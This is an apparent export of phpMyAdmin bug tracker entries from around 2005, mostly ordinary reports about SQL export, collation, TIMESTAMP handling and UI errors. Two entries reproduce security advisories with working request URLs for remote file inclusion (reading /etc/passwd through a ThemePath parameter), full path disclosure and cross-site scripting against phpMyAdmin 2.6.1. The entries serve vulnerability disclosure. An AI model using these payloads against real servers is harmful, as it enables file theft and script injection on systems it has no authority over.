Original URL https sourceforge.net p phpmyadmin bugs 1607 https sourceforge.net p phpmyadmin bugs 1607 Original author unclef Found in version 2.6.1","bug"
"24444","7974","Default MySQLi socket value is ignored.
It seems that setting mysqli.default socket in the php.ini file is ignored by PMA.
The connection to the MySQL server fails, unless the socket is specified in the config.inc.php file.
It works fine without specifying the socket in config.inc.php) when mysql extension is used instead mysqli.
Original URL https sourceforge.net p phpmyadmin bugs 1608 https sourceforge.net p phpmyadmin bugs 1608 Original author unclef Found in version 2.6.1","bug"
"24444","7975","Remote file inclusion.
BEGIN PGP SIGNED MESSAGE Hash SHA1 [phpMyAdmin 2.6.1 Remote file inclusion cXIb8O3.4] Author cXIb8O3 Date 21.2.2005 0.Description phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web.
Currently it can create and drop databases, create drop alter tables, delete edit add fields, execute any SQL statement, manage keys on fields.
1.
Remote file inclusion 1.0 This bug exist in css phpmyadmin.css.php.
You can include files.
Error exist in Code tmp file = GLOBALS[ cfg ][ ThemePath ] .
.
theme .
css theme right.css.php ; if file exists tmp file)) \{ include tmp file); \} end of include theme right.css.php And now you can get files.
For exemple http [HOST] [DIR] css phpmyadmin.css.php?GLOBALS[cfg][ThemePath]= etc theme=passwd 00 1.1 Or next include is in libraries database interface.lib.php Code 18 require once .
libraries dbi .
cfg[ Server ][ extension ] .
.dbi.lib.php ); For exemple http [HOST] [DIR] libraries database interface.lib.php?cfg[Server][extension]=cXIb8O3 Error message Warning main .
libraries dbi cXIb8O3.dbi.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries database interface.lib.php on line 18 Fatal error main ) [function.require] Failed opening required .
libraries dbi cXIb8O3.dbi.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries database interface.lib.php on line 18 Or if you want and if you see php error, can you make xss with php buq.
For Exemple http [HOST] [DIR] libraries database interface.lib.php?cfg[Server][extension]= 3Ch1 3EHi.
20I 20am 20cXIb8O3 3C h1 3E 2.
How to fix Download the new version of the script or update.
3.
Greets sp3x.
i need help.. 4.Contact Author Maksymilian Arciemowicz Location Poland Jelenia Gora), Luxembourg Bereldange) Email max [at] jestsuper [dot] pl GPG KEY http security.jestsuper.pl http securityreason.com Team BEGIN PGP SIGNATURE Version GnuPG v1.2.6 FreeBSD) iD8DBQFCG5WfznmvyJCR4zQRAjwxAJ9iJkCGyD5HPMCbOjYb1WdR9HEcdwCgkHLO 2FuB5Nqz2rMTa1b26PMgzrk= =oyWn END PGP SIGNATURE Original URL https sourceforge.net p phpmyadmin bugs 1609 https sourceforge.net p phpmyadmin bugs 1609 Original author cxib8o3 Found in version 2.6.1","bug"
"24444","7976","Possible XSS Attacks.
BEGIN PGP SIGNED MESSAGE Hash SHA1 [phpMyAdmin 2.6.1 Full Path Disclosure and XSS cXIb8O3.5] Author cXIb8O3 Date 22.2.2005 0.Description phpMyAdmin 2.6.1 is a tool written in PHP intended to handle the administration of MySQL over the Web.
Currently it can create and drop databases, create drop alter tables, delete edit add fields, execute any SQL statement, manage keys on fields.
1.
Full Path Disclosure 1.0 http [HOST] [DIR] libraries sqlvalidator.lib.php?cfg[SQLValidator][use]=cXIb8O3 Error message Warning main .
libraries sqlvalidator.class.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries sqlvalidator.lib.php on line 39 Fatal error main ) [function.require] Failed opening required .
libraries sqlvalidator.class.php include path= . )
in www phpMyAdmin 2.6.1 libraries sqlvalidator.lib.php on line 39 1.1 http [HOST] [DIR] libraries sqlparser.lib.php Error message Warning main .
libraries string.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries sqlparser.lib.php on line 46 Fatal error main ) [function.require] Failed opening required .
libraries string.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries sqlparser.lib.php on line 46 1.2 http [HOST] [DIR] libraries select theme.lib.php Error message Warning main .
libraries grab globals.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries select theme.lib.php on line 34 Fatal error main ) [function.require] Failed opening required .
libraries grab globals.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries select theme.lib.php on line 34 1.3 http [HOST] [DIR] libraries select lang.lib.php Error message Warning main .
libraries grab globals.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries select lang.lib.php on line 14 Fatal error main ) [function.require] Failed opening required .
libraries grab globals.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries select lang.lib.php on line 14 1.4 http [HOST] [DIR] libraries relation cleanup.lib.php Error message Warning main .
libraries relation.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries relation cleanup.lib.php on line 10 Fatal error main ) [function.require] Failed opening required .
libraries relation.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries relation cleanup.lib.php on line 10 1.5 http [HOST] [DIR] libraries header meta style.inc.php Error message Fatal error Call to undefined function PMA setFontSizes ) in www phpMyAdmin 2.6.1 libraries header meta style.inc.php on line 9 1.6 http [HOST] [DIR] libraries get foreign.lib.php?foreigners=cXIb8O3 field=hi foreigners[hi]=unloved Error message Fatal error Call to undefined function PMA countRecords ) in www phpMyAdmin 2.6.1 libraries get foreign.lib.php on line 28 1.7 http [HOST] [DIR] libraries display tbl links.lib.php?doWriteModifyAt=left del url=Smutno is display[del lnk]=Mi Error message Fatal error Call to undefined function PMA linkOrButton ) in www phpMyAdmin 2.6.1 libraries display tbl links.lib.php on line 28 1.8 http [HOST] [DIR] libraries display export.lib.php Error message Warning main .
libraries relation.lib.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries display export.lib.php on line 6 Fatal error main ) [function.require] Failed opening required .
libraries relation.lib.php include path= . )
in www phpMyAdmin 2.6.1 libraries display export.lib.php on line 6 1.9 http [HOST] [DIR] libraries db table exists.lib.php Error message Fatal error Call to undefined function PMA sendHeaderLocation ) in www phpMyAdmin 2.6.1 libraries db table exists.lib.php on line 16 1.10 http [HOST] [DIR] libraries charset conversion.lib.php?cfg[AllowAnywhereRecoding]=smutno allow recoding=mi Error message Fatal error Call to undefined function PMA dl ) in www phpMyAdmin 2.6.1 libraries charset conversion.lib.php on line 42 1.11 http [HOST] [DIR] libraries fpdf ufpdf.php Error message Warning main .
libraries fpdf fpdf.php) [function.main] failed to open stream No such file or directory in www phpMyAdmin 2.6.1 libraries fpdf ufpdf.php on line 18 Warning main ) [function.include] Failed opening .
libraries fpdf fpdf.php for inclusion include path= . )
in www phpMyAdmin 2.6.1 libraries fpdf ufpdf.php on line 18 Fatal error Class FPDF not found in www phpMyAdmin 2.6.1 libraries fpdf ufpdf.php on line 20 1.12 http [HOST] [DIR] libraries dbi mysqli.dbi.lib.php Error message Fatal error Call to undefined function PMA dl ) in www phpMyAdmin 2.6.1 libraries dbi mysqli.dbi.lib.php on line 13 1.13 http [HOST] [DIR] libraries dbg setup.php?GLOBALS[cfg][DBG][enable]=cXIb Error message Fatal error Call to undefined function PMA dl ) in www phpMyAdmin 2.6.1 libraries dbg setup.php on line 10 1.14 http [HOST] [DIR] libraries auth cookie.auth.lib.php?coming from common=cXIb8O3 Error message Fatal error Call to undefined function PMA setFontSizes ) in www phpMyAdmin 2.6.1 libraries auth cookie.auth.lib.php on line 17 2.
XSS aka Cross Site Scripting 2.0 http [HOST] [DIR] libraries select server.lib.php?cfg[Servers][cXIb8O3]=toja cfg[Servers][sp3x]=toty show server left=MyToMy strServer=[XSS 20code] http [HOST] [DIR] libraries select server.lib.php?cfg[Servers][cXIb8O3]=toja cfg[Servers][sp3x]=toty cfg[BgcolorOne]=777777 22 3E 3CH1 3E[XSS 20code] http [HOST] [DIR] libraries select server.lib.php?cfg[Servers][cXIb8O3]=toja cfg[Servers][sp3x]=toty strServerChoice= 3CH1 3EXSS 2.1 http [HOST] [DIR] libraries display tbl links.lib.php?doWriteModifyAt=left del url=Smutno is display[del lnk]=Mi bgcolor= 22 3E[XSS 20code] http [HOST] [DIR] libraries display tbl links.lib.php?doWriteModifyAt=left del url=Smutno is display[del lnk]=Mi row no= 22 3E[XSS 20code] 2.2 http [HOST] [DIR] themes original css theme left.css.php?num dbs=0 left font family=[XSS] and more in this file.
2.3 http [HOST] [DIR] themes original css theme right.css.php?right font family=[XSS] and more in this file.
3.
How to fix Download the new version of the script or update.
4.
Greets sp3x and ladyBMS 5.Contact Author Maksymilian Arciemowicz Location Poland Jelenia Gora), Luxembourg Bereldange) Email max [at] jestsuper [dot] pl GPG KEY http security.jestsuper.pl http securityreason.com Team BEGIN PGP SIGNATURE Version GnuPG v1.2.6 FreeBSD) iD8DBQFCG5UVznmvyJCR4zQRAjWPAJ426XMVICiyHa8uWL0bkuTaXbeMNACdFRzq BrQu2PRFI Myhw5gg8rGW9s= =miO8 END PGP SIGNATURE i am waiting for a paches...
Original URL https sourceforge.net p phpmyadmin bugs 1610 https sourceforge.net p phpmyadmin bugs 1610 Original author cxib8o3 Found in version 2.6.1","bug"
"24444","7977","tooltip.js undefined var, when connection error.
only happened at connection error function mouseMove e) \{ var x=0, y=0, plusX=0, plusY=0, docX=0; docY=0; var divHeight = myTooltipContainer.clientHeight; this line Original URL https sourceforge.net p phpmyadmin bugs 1611 https sourceforge.net p phpmyadmin bugs 1611 Original author xuefer Found in version Latest Git","bug"
"24444","7978","multiple table optimize not working.
I select some db list of tables will show in right frame.
Now I click Select all under the list and choose Optimize from dropdown menu.
Then SQL server reports error OPTIMIZE TABLE , `phpbb banlist` , `phpbb categories` , `phpbb config` , `phpbb confirm` , `phpbb disallow` , `phpbb forum prune` , `phpbb forums` , `phpbb groups` , `phpbb posts` , `phpbb posts text` , `phpbb privmsgs` , `phpbb privmsgs text` , `phpbb ranks` , `phpbb search results` , `phpbb search wordlist` , `phpbb search wordmatch` , `phpbb sessions` , `phpbb smilies` , `phpbb themes` , `phpbb themes name` , `phpbb topics` , `phpbb topics watch` , `phpbb user group` , `phpbb users` , `phpbb vote desc` , `phpbb vote results` , `phpbb vote voters` 1064 You have an error in your SQL syntax near `phpbb banlist`, `phpbb categories`, `phpbb config`, `phpbb confirm`, `phpbb di at line 1 I think the problem is , just before the first table name.
With 2.6.1 it worked fine.
Maybe it s problem with browser I tried in Firefox 1.0) Original URL https sourceforge.net p phpmyadmin bugs 1612 https sourceforge.net p phpmyadmin bugs 1612 Original author marki2 Found in version 2.6.1 pl1","bug"
"24444","7979","foreach ) error when editing.
While edit process phpMyAdmin crashes Warning Invalid argument supplied for foreach ) in srv www htdocs phpMyAdmin tbl replace.php on line 147 INSERT INTO `tableName` ) VALUES ), ) MySQL said Documentation 1062 Duplicate entry for key 2 Tested with MySQL 4.0.18 and MySQL 4.0.15 Original URL https sourceforge.net p phpmyadmin bugs 1613 https sourceforge.net p phpmyadmin bugs 1613 Original author deku Found in version 2.6.1 pl1","bug"
"24444","7980","Undefined offset 0 in tbl select.php.
This problem happens on the table Search page.
Using librairies grab globals.lib.php from 2.6.1 removes the problem.
Original URL https sourceforge.net p phpmyadmin bugs 1614 https sourceforge.net p phpmyadmin bugs 1614 Original author lem9 Found in version 2.6.1 pl1","bug"
"24444","7981","Partial dump selected tables ) dumps whole db.
I often use functionality of dumping selected table s).
Partial dump in 2.6.1 pl1 results in dumping whole db anyway.
Original URL https sourceforge.net p phpmyadmin bugs 1615 https sourceforge.net p phpmyadmin bugs 1615 Original author psyborgsf Found in version 2.6.1 pl1","bug"
"24444","7982","Binlog errors with MySQL 5.
Hi, there s an index error on the array that show the fields information about the binlogs.
the wrong index is value[ Orig log pos ]; the right index id value[ End log pos ]; Lorenzo Original URL https sourceforge.net p phpmyadmin bugs 1616 https sourceforge.net p phpmyadmin bugs 1616 Original author strozzino Found in version 2.6.1 pl2","bug"
"24444","7983","Syntax highlighting Missing MySQL functions.
Hi, I recognised that the following MySQL functions are not highlighted by the analyzer STR TO DATE GET FORMAT Best regards Mathias Original URL https sourceforge.net p phpmyadmin bugs 1617 https sourceforge.net p phpmyadmin bugs 1617 Original author mathiasl26 Found in version 2.6.1 pl2","bug"
"24444","7984","column names starting with str .
I have a column in my db named strona with type BIGINT 128) UNSIGNED NOT NULL DEFAULT 0.
Updating its value for example from 0 to 2) on tbl change.php is not working at all.
Generated SQL query does not include that change at all it only contains setting of all NULL values.
When I change the column name for example to XXX it works perfectly and the change of XXX column is included in SQL query.
Here is my table s structure CREATE TABLE `pu artykuly` `aid` int 11) NOT NULL auto increment, `nid` int 11) NOT NULL default 7 , `dzial pre` varchar 32) NOT NULL default , `dzial post` varchar 64) NOT NULL default , `strona` bigint 128) unsigned NOT NULL default 0 , `podstrona` tinyint 3) unsigned NOT NULL default 0 , `tytul` varchar 255) NOT NULL default , `podtytul` varchar 255) default NULL, `autorzy` text NOT NULL, `pochodzenie` text, `tresc` text, PRIMARY KEY `aid`), FULLTEXT KEY `fulltext` `tytul`,`podtytul`,`autorzy`,`pochodzenie`,`tresc`) ) TYPE=MyISAM AUTO INCREMENT=249 ; Original URL https sourceforge.net p phpmyadmin bugs 1618 https sourceforge.net p phpmyadmin bugs 1618 Original author jszczypk Found in version 2.6.1 pl2","bug"
"24444","7985","Documentation for PDF Pages wrong.
Hi.
The documentation for the PDF Pages feature was pretty wrong and hard to understand so I rewrote it.
Patch against HEAD attached.
Original URL https sourceforge.net p phpmyadmin bugs 1619 https sourceforge.net p phpmyadmin bugs 1619 Original author ryandesign Found in version Latest Git","bug"
"24444","7986","Incorrect alt text for logout icon on home page.
On the Welcome page the alt text for the logout icon is set to alt= Change password , where as the alt text for the log out icon on the left menu is set to Log out .
Original URL https sourceforge.net p phpmyadmin bugs 1620 https sourceforge.net p phpmyadmin bugs 1620 Original author greenfrogsf Found in version 2.6.1 pl2","bug"
"24444","7987","Bad export compatibility in TRADITIONAL mode.
When exporting a DB clicking the DB name file db details export.php, after of selecting in the dropdown menu) and select the option TRADITIONAL in SQL export compatibility , this export a HTML generated code of the php file.
Original URL https sourceforge.net p phpmyadmin bugs 1621 https sourceforge.net p phpmyadmin bugs 1621 Original author hiperjp Found in version 2.6.1 pl2","bug"
"24444","7988","need to escape possible ENUM or SET values.
I have a column of type ENUM !
, , , .
, .
, , ; , ?
, amp; 8211; , amp; 8212; , amp;ldquo; , amp;rdquo; , amp;lsquo; , amp;rsquo; ) and the HTML entities display themselves.
That is, I actually see the quote marks at tbl properties structure.php and when trying to edit the field at tbl alter.php instead of the HTML entities.
Therefore if I saved the field without editing the text box it would change the field type.
You need to run htmlspecialchars ) or htmlentities ) on the column length values before sending them to the client.
I think the fix for tbl alter.php could be placed at line 277 of tbl properties.inc.php it will always run ALTER on that field, but otherwise fine) and that the fix for tbl properties structure.php could be placed at line 149 of tbl properties structure.php, but I have only tested the second fix works fine).
A simple textcase would be making a column ENUM amp;amp; ) Original URL https sourceforge.net p phpmyadmin bugs 1624 https sourceforge.net p phpmyadmin bugs 1624 Original author r3m0t Found in version 2.6.1 pl3","bug"
"24444","7989","Path in Cookie.
Hello, i think the path set in the cookie should have an ending .
I installed two instances of phpMyAdmin http webserver phpMyAdmin and http webserver phpMyAdminTest The path in the Cookie is phpMyAdmin or phpMyAdminTest.
I get problems when I switch between the two instances of phpMyAdmin.
According to the cookie specifikation of Netscape, the first cookie also matches with the second path http wp.netscape.com newsref std cookie spec.html [...] The path attribute is used to specify the subset of URLs in a domain for which the cookie is valid.
If a cookie has already passed domain matching, then the pathname component of the URL is compared with the path attribute, and if there is a match, the cookie is considered valid and is sent along with the URL request.
lt;b gt;The path foo would match foobar lt; b gt;and foo bar.html .
The path is the most general path.
[...] I think adding an ending to the path solves this problem because phpMyAdmin does not match phpMyAdminTest .
I changed the source of phpMyAdmin to test my solutions and it worked for me.
Greetings Andi Original URL https sourceforge.net p phpmyadmin bugs 1622 https sourceforge.net p phpmyadmin bugs 1622 Original author andilist Found in version 2.6.1 pl2","bug"
"24444","7990","Create new database No Privileges on main page).
apache 2.0.53 php 5.0.3 hardened php 0.2.6 mysql 4.0.23 phpMyAdmin 2.6.1 pl3 The database is on a different host than the webserver and accessed with TCP IP.
The phpMyAdmin main page shows Create new database No Privileges but I m logged in as a user with ALL PRIVILEGES I can create databases from the databases page without problems.
I first noticed this in 2.6.1, now upgraded to 2.6.1 pl3.
This bug is not limiting functionality, it s just a bit annoying to have a red warning on the main page.
Original URL https sourceforge.net p phpmyadmin bugs 1626 https sourceforge.net p phpmyadmin bugs 1626 Original author anbe","bug"
"24444","7991","Bug with last inserted id.
Dear phpMyAdmin Team I m not sure if this bug has already been reported, but my search returned nothing.
When you enter a set of data in a table with auto increment, there s usually the id of this insert displayed.
Its called Inserted row id .
Now when you insert 2 Sets of data, the inserted row id, which is discribed as the last inserted id, is the id of the first data record you entered and not the second.
It may be a bug of mysql or even intended, but it s really confusing.
So i would propose to show either the id of the last record you entered, or don t display it when you enter more than one record.
I think this would prevent missunderstandings.
Yours faithfully doped04 Original URL https sourceforge.net p phpmyadmin bugs 1623 https sourceforge.net p phpmyadmin bugs 1623 Original author doped04 Found in version Latest Git","bug"
"24444","7992","Database comments broken.
Marc, I guess it s because of your latest changes.
Try Operations tab on database and set comment.
Warning mysql fetch array ) supplied argument is not a valid MySQL result resource in home michal work pma libraries dbi mysql.dbi.lib.php on line 118 Notice Undefined variable types in home michal work pma libraries relation.lib.php on line 563 Notice Undefined variable collations in home michal work pma libraries relation.lib.php on line 563 Notice Undefined variable nulls in home michal work pma libraries relation.lib.php on line 563 Notice Undefined variable defaults in home michal work pma libraries relation.lib.php on line 563 Notice Undefined variable extras in home michal work pma libraries relation.lib.php on line 563 Original URL https sourceforge.net p phpmyadmin bugs 1625 https sourceforge.net p phpmyadmin bugs 1625 Original author nijel Found in version Latest Git","bug"
"24444","7993","Data Dictionary broken.
When trying to access the data dictionary for a database, phpMyAdmin runs into a MySQL error by producing an invalid query like this one SELECT column name, COMMENT FROM `phpmyadmin`.WHERECONVERT db name USING utf8 ) = test AND CONVERT table name USING utf8 ) = foo QA 2 6 1 with the same configuration on the same machine works fine.
php 5.0.3 MySQL 4.1.10 Original URL https sourceforge.net p phpmyadmin bugs 1627 https sourceforge.net p phpmyadmin bugs 1627 Original author rabus Found in version Latest Git","bug"
"24444","7994","Data base list doesn t refresh.
After adding o deleting a DB, the rigth frame doesn t update correctly.
1.
After delete a DB, the DB is selected in the combo 2.
After add a DB via SQL, it is not shown in the list Original URL https sourceforge.net p phpmyadmin bugs 1628 https sourceforge.net p phpmyadmin bugs 1628 Original author linsms Found in version 2.6.1 pl3","bug"
"24444","7995","phpMyAdmin can t make EXPORT progress in one minute.
I am realy tired of this VERY VERY OLD BUG!!!
I have a database more thatn 15MB.
I am trying to EXPORT it to LOCAL folder with template DB [ Y m d H M] phpMyAdmin can t make progress in one minute so it begins to generate new files every minute, like forum [2005 03 15 18 28].sql forum [2005 03 15 18 29].sql forum [2005 03 15 18 30].sql If I try to use template DB [ Y m d H] phpMyAdmin every minute will say that file forum [2005 03 15 18].sql is already there and he can t save another one forum [2005 03 15 18].sql I realy can t understand why you can t learn phpMyAdmin to COPY DB to one BIG file.
Once you said to me than don t use phpMyAdmin for big DB.
People, 15MB DB is not a BIG DB it is a small one... P.S.
Every file of forum [2005 03 15 18 28].sql forum [2005 03 15 18 29].sql forum [2005 03 15 18 30].sql begins saving DB DataBase) from the beginning!!!
In other words each file starts from phpMyAdmin SQL Dump version 2.6.1 pl2 http www.phpmyadmin.net Original URL https sourceforge.net p phpmyadmin bugs 1630 https sourceforge.net p phpmyadmin bugs 1630 Original author makc666 Found in version 2.6.1 pl3","bug"
"24444","7996","new TIMESTAMP attributes and NULL detection.
MySQL server 4.1.7 phpMyAdmin 2.6.1 pl3 PHP 5.0.3 PMA is not handling the new TIMESTAMP attributes correctly TIMESTAMP attributes have changed since MySQL 4.1).
Example CREATE TABLE `test` `blabla` VARCHAR 255), `update time` TIMESTAMP NOT NULL DEFAULT CURRENT TIMESTAMP ); PMA detects the above `update time` col as NULL.
Try to change the attributes of the `update time` by using the PMA dedicated form tbl alter.php) and click on Save without changing any attribute but the Null attribute set it on NOT NULL since PMA was wrong by detecting it as NULL) you would expect PMA NOT to alter the `test` table either by not sending any ALTER query or by sending the following zero alteration query ALTER TABLE `test` CHANGE `update time` `update time` TIMESTAMP NOT NULL DEFAULT CURRENT TIMESTAMP; Instead of that, PMA sends the following query ALTER TABLE `test` CHANGE `update time` `update time` TIMESTAMP DEFAULT CURRENT TIMESTAMP NOT NULL; which as the nasty consequence to change the DEFAULT attribute to 0000 00 00 00 00 00 Keep using the PMA dedicated form and try to set the NULL attribute for the `update time` col beginning with MySQL 4.1.6, you can include the NULL attribute in the definition of a TIMESTAMP column).
PMA will send the query ALTER TABLE `test` CHANGE `update time` `update time` TIMESTAMP DEFAULT CURRENT TIMESTAMP ; which fails to do the job because the NULL attribute is not specified but it still sets the DEFAULT attribute to 0000 00 00 00 00 00 ) Indeed, it seems that the following queries are equivalent for a TIMESTAMP col ALTER TABLE `test` CHANGE `update time` `update time` TIMESTAMP; ALTER TABLE `test` CHANGE `update time` `update time` TIMESTAMP NOT NULL; This has another nasty consequence for the PMA user.
With the table CREATE TABLE `test2` `blabla` VARCHAR 255), `update time` TIMESTAMP NULL ); the `update time` col has now the NULL attribute.
Try to edit the `update time` attributes by using the PMA dedicated form and click on Save without changing anything.
PMA will try to send the following query ALTER TABLE `test2` CHANGE `update time` `update time` TIMESTAMP DEFAULT NULL; which will be rejected by the MySQL server Error 1067 Invalid default value for update time ) because it is equivalent to the following query ALTER TABLE `test2` CHANGE `update time` `update time` TIMESTAMP NOT NULL DEFAULT NULL; So you ll have to give a default value not conflicting with the NOT NULL attribute in the PMA dedicated form if you want PMA to send a valid query.
Another bad news is that PMA will ALWAYS send a query resulting in the NULL attribute being switched to NOT NULL whatever choice you make in the dedicated form).
Original URL https sourceforge.net p phpmyadmin bugs 1629 https sourceforge.net p phpmyadmin bugs 1629 Original author alaoglu Found in version 2.6.1 pl3","bug"
"24444","7997","USE clause fails on names with hyphens.
Not sure if the chosen category is correct.
Where can I find a description of them?)
Entering a USE clause in the SQL tab fails for file names containing hyphens fails.
Try USE pay payments Result SQL query USE pay payments MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near payments at line 1 Apparently extra spaces are inserted in the query.
Original URL https sourceforge.net p phpmyadmin bugs 1631 https sourceforge.net p phpmyadmin bugs 1631 Original author leonardjo Found in version 2.6.1 pl3","bug"
"24444","7998","[ only db ] sort databases, not array order.
When assigning an array of database names to [ only db ] I find that the order is always displayed alphabetically in the left nav.
No matter how the database names are ordered in the array they always appear on alpha order.
PMA = 2.6.1 mysql = 3.23.58 OS = Debian php = 4.3.10 1.dotdeb.0 Apache 1.3 Original URL https sourceforge.net p phpmyadmin bugs 1634 https sourceforge.net p phpmyadmin bugs 1634 Original author ted rheingold Found in version 2.6.2","bug"
"24444","7999","select lang.inc.php doesn t exist.
The select lang.inc.php file mentionned in Documentation.html for cfg[ DefaultLang ] and cfg[ Lang ] parameters doesn t exist anymore, it has been replaced by select lang.lib.php in libraries folder.
Original URL https sourceforge.net p phpmyadmin bugs 1632 https sourceforge.net p phpmyadmin bugs 1632 Original author mediaforest Found in version 2.6.1 pl3","bug"
"24444","8000","Create New Database under Databases link.
In 2.6.1 pl3, the frontpage for a user that does not have create database privileges properly states No Privileges .
However, if the user clicks on the Databases link, the input box is there for creating a new database, even though they do not have permission to do so.
I have the control user setup properly, no blank users in the mysql user db, and all permissions for the user are N except for File priv.
If you need any more details, please let me know.
Rob Original URL https sourceforge.net p phpmyadmin bugs 1633 https sourceforge.net p phpmyadmin bugs 1633 Original author robfico Found in version 2.6.1 pl3","bug"
"24444","8001","Copying INNODB tables with FK Contraints.
summary continued) ... when copying in the same database.
When copying a table of type INNODB with a foreign key constraint, mysql reports an syntax error CREATE TABLE `testadmin` `ID` VARCHAR 255 ) NOT NULL , `FK1` VARCHAR 255 ) NOT NULL , `FK2` VARCHAR 255 ) NOT NULL , PRIMARY KEY `ID` ) ) TYPE = InnoDB; ALTER TABLE `testadmin` ADD INDEX `fk1 idx` `FK1` ); ALTER TABLE `testadmin` ADD INDEX `fk2 idx` `FK2` ); ALTER TABLE `testadmin` ADD FOREIGN KEY FK1 ) REFERENCES lt;some table gt; ID ) ON DELETE RESTRICT; ALTER TABLE `testadmin` ADD FOREIGN KEY FK2 ) REFERENCES lt;some other table gt; ID) ON DELETE RESTRICT; Assuming lt;some table gt; and lt;some other table gt; exists in both databases and have identical structure.
Using Operations, copy table the following SQL Statement is generated CREATE TABLE lt;other database gt;.`testadmin` `ID` varchar 255 ) NOT NULL default , `FK1` varchar 255 ) NOT NULL default , `FK2` varchar 255 ) NOT NULL default , PRIMARY KEY `ID` ) , KEY `fk1 idx` `FK1` ) , KEY `fk2 idx` `FK2` ) CONSTRAINT `testadmin ibfk 1` FOREIGN KEY `FK1` ) REFERENCES lt;some table gt; `ID` ) ) TYPE = InnoDB The generated statement is buggy and therefore MySQL reports an error.
Original URL https sourceforge.net p phpmyadmin bugs 1635 https sourceforge.net p phpmyadmin bugs 1635 Original author xarrion Found in version 2.5.7 pl1","bug"
"24444","8002","Exporting results from queries with limit keyword.
Hello, there is a bug after executing a query with a LIMIT keyword, for eg SELECT FROM foobar LIMIT 0,100 or SELECT FROM foobar LIMIT 100 and trying to run an export operation for results of the query.
If you choose to dump a specific number of rows Dump x row s) starting at record y) on the export, which is filled by default page, the export fails.
The query is not parsed in a proper way, and the second LIMIT kewyrod is being added to the sql.
The query looks like this SELECT FROM foobar LIMIT 0 , 10 LIMIT 10 and the export fails.
Original URL https sourceforge.net p phpmyadmin bugs 1636 https sourceforge.net p phpmyadmin bugs 1636 Original author bartek muracki Found in version 2.6.0 pl2","bug"
"24444","8003","Copying a db does not refresh left frame.
When copying a database, the DB list in the left frame should be refreshed but it s not.
Original URL https sourceforge.net p phpmyadmin bugs 1637 https sourceforge.net p phpmyadmin bugs 1637 Original author rabus Found in version Latest Git","bug"
"24444","8004","2.6.2 dev) Undefined index Field on table creation form.
On DB structure view, I enter a table name and the desired number of fields into the create new table dialog.
On the next page, I see the following php error messages above the fields list, repeated once per field Notice Undefined index Field in [pma path] tbl properties.inc.php on line 324 Notice Undefined index Field in [pma path] tbl properties.inc.php on line 327 Original URL https sourceforge.net p phpmyadmin bugs 1638 https sourceforge.net p phpmyadmin bugs 1638 Original author rabus Found in version Latest Git","bug"
"24444","8005","NOT NULL adding fields.
When I add a field to a table and set Null values to NOT NULL , it creates field with setting Null and Default Null, though SQL sentence in upper corner is correct.
I must edit properties of the field again.
But when I enter the same SQL command in SQL window it works OK. Running MySQL 4.10a nt PHP 5.0.3 on IIS5 Original URL https sourceforge.net p phpmyadmin bugs 1639 https sourceforge.net p phpmyadmin bugs 1639 Original author doguedebordeaux Found in version Latest Git snapshot","bug"
"24444","8006","Explicitly setting collation for a field.
Hi When I set collation for a field different from table collation, system does not apply such setting and sets table s default collation for that field.
Using 29 03 2005 CVS snapshot mysql 4.1.10.
Original URL https sourceforge.net p phpmyadmin bugs 1640 https sourceforge.net p phpmyadmin bugs 1640 Original author doguedebordeaux Found in version Latest Git snapshot","bug"
"24444","8007","Don t allow to drop information schema.
When using MySQL 5.0.3beta and clicking on Databases button shows the ability to drop the information schema table while.
While when you select the information schema from the database menu in the left frame this isn t possible.
Original URL https sourceforge.net p phpmyadmin bugs 1641 https sourceforge.net p phpmyadmin bugs 1641 Original author olger1024 Found in version 2.6.2 beta1","bug"
"24444","8008","Undefined offsets.
When using MySQL 3.23.55, I get Notice Undefined offset 1 in mnt data www pma left.php on line 521 Original URL https sourceforge.net p phpmyadmin bugs 1642 https sourceforge.net p phpmyadmin bugs 1642 Original author nijel Found in version Latest Git","bug"
"24444","8009","Selection without defining columns.
SELECT FROM table WHERE x=2; The results table isn t created properly when no columns si defined.
No edit an action buttons is present.
The checkboxes is also missing.
If the table has many columns and the computer is slow, it s nice to send queries like this when you re about to edit many rows without having the need to see them.
Original URL https sourceforge.net p phpmyadmin bugs 1643 https sourceforge.net p phpmyadmin bugs 1643 Original author atlescripts","bug"
"24444","8010","Deletion flaw.
When do a delete, and delete results, it deletes via GET.
This is a problem, as the URL is stored in your browser, so you can accidently click on that URL when trying to access PHPmyadmin, at a latter time.
When clicking on this URL, obviously it will run the query and DELETE THE RESULTS...
This is especialy problematic with EMPTY...
The suggested fix to this would be to have a confirm page instead of a JAVASCRIPT confirm box, when deleting or emptying table entries, and this page would then POST to the DELETE page, thus getting rid of the bug...
Original URL https sourceforge.net p phpmyadmin bugs 1644 https sourceforge.net p phpmyadmin bugs 1644 Original author steve will","bug"
"24444","8011","Undefined variable notice when editing field.
I get the following notice when trying to edit a field Notice Undefined variable submit default current timestamp in c \documents and settings\chris\my documents\my websites\localhost\pma\tbl properties.inc.php on line 347 This happens since 2.6.2beta1 and still in RC1 I can reproduce it in every table, on every edited field.
When editing multiple fields at a time, I get as many notices as edited fields.
Original URL https sourceforge.net p phpmyadmin bugs 1645 https sourceforge.net p phpmyadmin bugs 1645 Original author k mystik Found in version 2.6.2 rc1","bug"
"24444","8012","Wrong Links in server privileges.php.
You should not use PHP SELF in server privileges in server privileges.php.
You have a URL variable in the config.inc.php file!
Best regards Domi Original URL https sourceforge.net p phpmyadmin bugs 1646 https sourceforge.net p phpmyadmin bugs 1646 Original author dhi Found in version 2.6.1 pl3","bug"
"24444","8013","header not sent in multi table print view.
